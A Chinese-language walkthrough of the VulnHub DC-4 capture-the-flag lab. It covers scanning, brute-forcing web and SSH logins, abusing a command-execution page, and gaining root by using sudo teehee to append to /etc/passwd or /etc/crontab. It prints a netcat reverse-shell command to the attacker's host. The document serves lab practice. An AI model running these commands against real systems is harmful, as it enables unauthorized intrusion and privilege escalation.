1. 程式人生 > 實用技巧 >VulnHub——DC-4

VulnHub——DC-4

測試環境

DC-4:192.168.5.153

Kali:192.168.5.128

資訊收集

主機發現

埠服務掃描

web指紋識別

網站目錄掃描

GetShell

暴力破解

瀏覽web頁面,是一處登陸點,提示只能使用管理員使用者登入

抓個包,暴力破解密碼,使用者名稱:admin,密碼:happy

命令執行漏洞

登陸進來之後點選command

發現是一處命令執行頁面

抓個包,測試發現存在任意命令執行漏洞

反彈shell

執行反彈shell命令,成功拿到webshell

nc -e /bin/sh 192.168.5.128 4444

提權

hydra暴破ssh

檢視passwd檔案,發現有三個使用者

在jim使用者目錄下,發現了密碼備份

使用python開啟web服務,下載到kali上面

九頭蛇暴力破解SSH,使用者名稱:jim,密碼:jibril04

SSH登入到jim使用者

在/var/mail目錄下發現了charles使用者留的一封信,裡面包含了密碼

再次使用SSH切換到charles使用者

teehee提權

sudo -l 發現能夠以root身份去執行teehee命令

這裡主要是用到teehee命令的-a選項,可以往檔案中寫入內容,不覆蓋內容。

方式一,寫入passwd檔案

既然以root身份執行命令,可以向passwd檔案中追加使用者,使其擁有root許可權

方式二,寫入定時指令碼

也可以在/etc/crontab下寫入定時計劃,一分鐘後執行/bin/sh提升到root許可權

總結

1、命令執行漏洞

2、teehee命令寫入檔案提權